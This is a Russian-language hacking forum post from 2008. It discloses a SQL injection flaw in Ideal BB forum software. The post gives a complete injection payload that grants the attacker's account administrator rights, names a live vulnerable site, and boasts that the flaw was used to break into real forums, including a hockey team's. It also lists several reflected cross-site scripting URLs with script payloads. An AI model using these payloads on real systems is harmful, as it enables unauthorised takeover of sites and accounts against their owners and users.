13.09.2008, 22:28
|
|
Постоянный
Регистрация: 17.05.2007
Сообщений: 334
Провел на форуме:
3242773
Репутация:
632
|
|
Уязвимость в Ideal BB
И так данная уязвимость была найдена у меня когда разбирал архив на диске, уязвимость заключается в том что отцувствует фильтрация в сообщениях пользователя благодоря которой мы можем выполнить произвольный скюл запрос ( что мы делаем в приведённом примере, а именно становимся администратором)
сам запрос: 0';update [dbo].[Members] set [dbo].[Members].[M_Level]=3 where [dbo].[Members].[Member_ID]=3407--
где:
[M_Level]=3 -даёт права админа
[Member_ID]= 3407 - ваш id.
пример:
до запроса:
сам запрос:
после:
пример уязвимого форума:
http://www.lucianopires.com.br/idealbb/default.asp
-----------------------------
при помощи данной уязвимости когда то был взломан форум xakep.ru и мной форум хоккейной команды: ньюёрские ренжеры
так же на форуме присутствуют и XSS
PHP код:
/topics.aspx?forumID=59%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/categoryindex.aspx?boardID=1%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/topics.aspx?date=12/05/2005&boardID= 1%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/posts.aspx?postID=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/forums.aspx?catID=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/member.aspx?memberID=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/topics.aspx?forumID=54&topicRepeater1-p= %22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
|
|
|